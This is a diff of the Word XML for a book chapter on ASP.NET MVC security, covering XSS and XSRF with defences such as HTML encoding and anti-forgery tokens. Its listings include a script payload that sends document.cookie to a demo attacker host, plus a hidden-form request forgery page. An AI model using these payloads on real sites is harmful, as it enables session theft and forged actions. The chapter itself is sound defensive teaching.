           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3792220"/>
@@ -1924,15 +1513,7 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 11.2 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>The</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> comment - unbeknownst to the visitor a nasty script is executed</w:t>
+        <w:t>Figure 11.2 The comment - unbeknownst to the visitor a nasty script is executed</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1959,88 +1540,41 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>p</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>&gt;Comment:&lt;/p&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>p</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>A long comment &lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>document.write</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">      |</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>#1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>'&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=http://localhost:8082/attack/</w:t>
+        <w:t>&lt;p&gt;Comment:&lt;/p&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&lt;p&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>A long comment &lt;script&gt;document.write(</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">      |#1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>'&lt;img src=http://localhost:8082/attack/</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">     |#1</w:t>
@@ -2052,27 +1586,7 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>register</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>?input</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=' +escape(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>register?input=' +escape(document.cookie)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">   |#1</w:t>
@@ -2103,15 +1617,7 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">#1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Our</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> nasty script</w:t>
+        <w:t>#1 Our nasty script</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2148,6 +1654,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="1496060"/>
@@ -2213,28 +1720,26 @@
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:commentRangeStart w:id="9"/>
+      <w:commentRangeStart w:id="14"/>
       <w:r>
         <w:t xml:space="preserve">Never trust input.  Never, ever, ever expect input to be safe.  </w:t>
       </w:r>
-      <w:commentRangeEnd w:id="9"/>
+      <w:commentRangeEnd w:id="14"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="9"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Whether </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks.  We don't trust it coming in, and we certainly don't trust it when we render it.  That's the key.</w:t>
+        <w:commentReference w:id="14"/>
+      </w:r>
+      <w:r>
+        <w:t>Whether it</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks.  We don't trust it coming in, and we certainly don't trust it when we render it.  That's the key.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2263,13 +1768,8 @@
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>One vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with our example application is that it rendered the submitted script as scrip</w:t>
+      <w:r>
+        <w:t>One vulnerability with our example application is that it rendered the submitted script as scrip</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">t to be executed by the browser (figure 11.2). Instead, we should have HTML encoded the comment.  HTML encoding transforms text from HTML that is interpreted by the browser into symbols that the browser will render without interpretation. Instead of our script being parsed and executed, it would have simply been displayed as text.  In our view we rendered the comment with this markup: </w:t>
@@ -2278,21 +1778,7 @@
         <w:rPr>
           <w:rStyle w:val="CodeinTable"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;%= </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinTable"/>
-        </w:rPr>
-        <w:t>Model.Comment</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinTable"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> %&gt;</w:t>
+        <w:t>&lt;%= Model.Comment %&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2343,37 +1829,7 @@
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;%= </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>HttpUtility.HtmlEncode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Model.Comment</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>) %&gt;</w:t>
+        <w:t>&lt;%= HttpUtility.HtmlEncode(Model.Comment) %&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2389,6 +1845,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3948881"/>
@@ -2441,15 +1898,7 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 11.4 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Our</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> script rendered harmlessly</w:t>
+        <w:t>Figure 11.4 Our script rendered harmlessly</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2465,15 +1914,7 @@
         <w:pStyle w:val="Sidebar"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">There's a new feature in ASP.NET 4 that allows developers to conveniently express HTML encoded output without using the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>HttpUtility.Encode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> helper function.  Instead of specifying output with </w:t>
+        <w:t xml:space="preserve">There's a new feature in ASP.NET 4 that allows developers to conveniently express HTML encoded output without using the HttpUtility.Encode helper function.  Instead of specifying output with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2491,17 +1932,10 @@
         <w:t>&lt;%: "text" %&gt;</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">.  For more information, refer to Phil </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Haack's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> blog post: </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="10"/>
+        <w:t xml:space="preserve">.  For more information, refer to Phil Haack's blog post: </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="15"/>
+      <w:commentRangeStart w:id="16"/>
       <w:r>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
@@ -2517,13 +1951,20 @@
       <w:r>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
-      <w:commentRangeEnd w:id="10"/>
+      <w:commentRangeEnd w:id="15"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="10"/>
+        <w:commentReference w:id="15"/>
+      </w:r>
+      <w:commentRangeEnd w:id="16"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:commentReference w:id="16"/>
       </w:r>
     </w:p>
     <w:p>
@@ -2544,28 +1985,6 @@
       <w:pPr>
         <w:pStyle w:val="Head3"/>
       </w:pPr>
-      <w:commentRangeStart w:id="11"/>
-      <w:r>
-        <w:t>11.2.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>1.2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="11"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:vanish/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:commentReference w:id="11"/>
-      </w:r>
       <w:r>
         <w:t>ASP.NET MVC Defaults</w:t>
       </w:r>
@@ -2615,41 +2034,16 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.8 [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ValidateInput</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>false)]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ValidateInput</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>false)]</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Listing 11.8 [ValidateInput(false)]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[ValidateInput(false)]</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                       #1</w:t>
@@ -2659,29 +2053,8 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ViewResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Save(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>CommentInput</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> form)</w:t>
+      <w:r>
+        <w:t>public ViewResult Save(CommentInput form)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2698,14 +2071,7 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> View(form);</w:t>
+        <w:t>return View(form);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2721,15 +2087,7 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">#1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ValidateInput</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> attribute disabling protection</w:t>
+        <w:t>#1 ValidateInput attribute disabling protection</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2813,6 +2171,7 @@
         <w:pStyle w:val="SidebarHead"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Smarter, safer browsers</w:t>
       </w:r>
     </w:p>
@@ -2821,15 +2180,7 @@
         <w:pStyle w:val="Sidebar"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Chrome 4 and the Firefox extension </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoScript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> provide input validation on the client.  They refuse to render any script that was present in the previous request.  While these measures are not fail-safe, they are useful tools users can employ to protect themselves against becoming victimized by certain web application vulnerabilities like XSS.</w:t>
+        <w:t>Chrome 4 and the Firefox extension NoScript provide input validation on the client.  They refuse to render any script that was present in the previous request.  While these measures are not fail-safe, they are useful tools users can employ to protect themselves against becoming victimized by certain web application vulnerabilities like XSS.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2872,15 +2223,7 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">In the example code for this chapter we've included a working XSRF demonstration. Again, there are two sites in the solution: a vulnerable one and the attacker.  The vulnerable site accepts a simple form post.  If you imagine the secure commands we issue in the course of a regular day - transferring funds between bank accounts, buying or selling securities, authorizing raises, it could be profitable for a hacker to formulate a special request on your behalf and have you </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>unknowningly</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> transmit it to a site you are known to visit.</w:t>
+        <w:t>In the example code for this chapter we've included a working XSRF demonstration. Again, there are two sites in the solution: a vulnerable one and the attacker.  The vulnerable site accepts a simple form post.  If you imagine the secure commands we issue in the course of a regular day - transferring funds between bank accounts, buying or selling securities, authorizing raises, it could be profitable for a hacker to formulate a special request on your behalf and have you unknowningly transmit it to a site you are known to visit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2896,6 +2239,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3845642"/>
@@ -2958,17 +2302,17 @@
       <w:r>
         <w:t xml:space="preserve">Behind the scenes in the </w:t>
       </w:r>
-      <w:commentRangeStart w:id="12"/>
+      <w:commentRangeStart w:id="17"/>
       <w:r>
         <w:t xml:space="preserve">bowels of the HTML source </w:t>
       </w:r>
-      <w:commentRangeEnd w:id="12"/>
+      <w:commentRangeEnd w:id="17"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="12"/>
+        <w:commentReference w:id="17"/>
       </w:r>
       <w:r>
         <w:t>another story is told, shown in listing 11.9.</w:t>
@@ -2981,49 +2325,30 @@
       <w:r>
         <w:t xml:space="preserve">Listing 11.9 </w:t>
       </w:r>
-      <w:commentRangeStart w:id="13"/>
-      <w:r>
-        <w:t>XSRF source</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="13"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:vanish/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:commentReference w:id="13"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>form</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> method="post" </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>action</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">="http://localhost:8082/home/save"&gt; </w:t>
+      <w:r>
+        <w:t xml:space="preserve">This </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">XSRF </w:t>
+      </w:r>
+      <w:r>
+        <w:t>example page can be used to breach secruity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">&lt;form method="post" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">action="http://localhost:8082/home/save"&gt; </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">   #1</w:t>
@@ -3042,28 +2367,15 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>input</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> id="Name" name="Name" </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>type</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">="hidden" value="gotcha!" /&gt; </w:t>
+        <w:t xml:space="preserve">&lt;input id="Name" name="Name" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">type="hidden" value="gotcha!" /&gt; </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">            #2</w:t>
@@ -3082,15 +2394,7 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>button</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> type="submit"&gt;Free!!&lt;/button&gt; </w:t>
+        <w:t xml:space="preserve">&lt;button type="submit"&gt;Free!!&lt;/button&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3130,19 +2434,18 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>When the aloof user clicks the button, the form is submitted.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  Not even the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> can save us now; we're already logged in! Figure 11.7 shows the result.</w:t>
       </w:r>
@@ -3204,15 +2507,7 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 11.7 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>The</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> form is posted to the vulnerable site</w:t>
+        <w:t>Figure 11.7 The form is posted to the vulnerable site</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3220,40 +2515,27 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">A savvy attacker would have used </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>javascript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to submit our request, stifling the response from our browser so we'd never knew it </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>occured</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> - until it was too late.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:commentRangeStart w:id="14"/>
+        <w:t>A savvy attacker would have used javascript to submit our request, stifling the response from our browser so we'd never knew it occured - until it was too late.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="18"/>
+      <w:commentRangeStart w:id="19"/>
       <w:r>
         <w:t>ASP.NET MVC 2 provides a simple mechanism for combating this vulnerability.</w:t>
       </w:r>
-      <w:commentRangeEnd w:id="14"/>
+      <w:commentRangeEnd w:id="18"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="14"/>
+        <w:commentReference w:id="18"/>
+      </w:r>
+      <w:commentRangeEnd w:id="19"/>
+      <w:r>
+        <w:commentReference w:id="19"/>
       </w:r>
     </w:p>
     <w:p>
@@ -3263,11 +2545,9 @@
       <w:r>
         <w:t xml:space="preserve">11.3.2 </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3276,24 +2556,14 @@
       <w:r>
         <w:t xml:space="preserve">The </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, when applied to an action, requires that the input be accompanied by a special token that ensures </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from the responding application only.  It must be used in tandem with a special HTML helper that outputs the token in the form in the HTML source.  Listing 11.10 shows the attribute on our vulnerable action.</w:t>
+      <w:r>
+        <w:t>, when applied to an action, requires that the input be accompanied by a special token that ensures its from the responding application only.  It must be used in tandem with a special HTML helper that outputs the token in the form in the HTML source.  Listing 11.10 shows the attribute on our vulnerable action.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3301,28 +2571,16 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Listing 11.10 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ValidateAntiForgeryToken</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>]</w:t>
+        <w:t>Listing 11.10 ValidateAntiForgeryTokenAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>[ValidateAntiForgeryToken]</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                #1</w:t>
@@ -3332,101 +2590,70 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>public ViewResult Save(InputModel form)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return View(form);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1 Protecting against XSRF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.11 shows the HTML helper we need in the form.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Listing 11.11 </w:t>
+      </w:r>
+      <w:r>
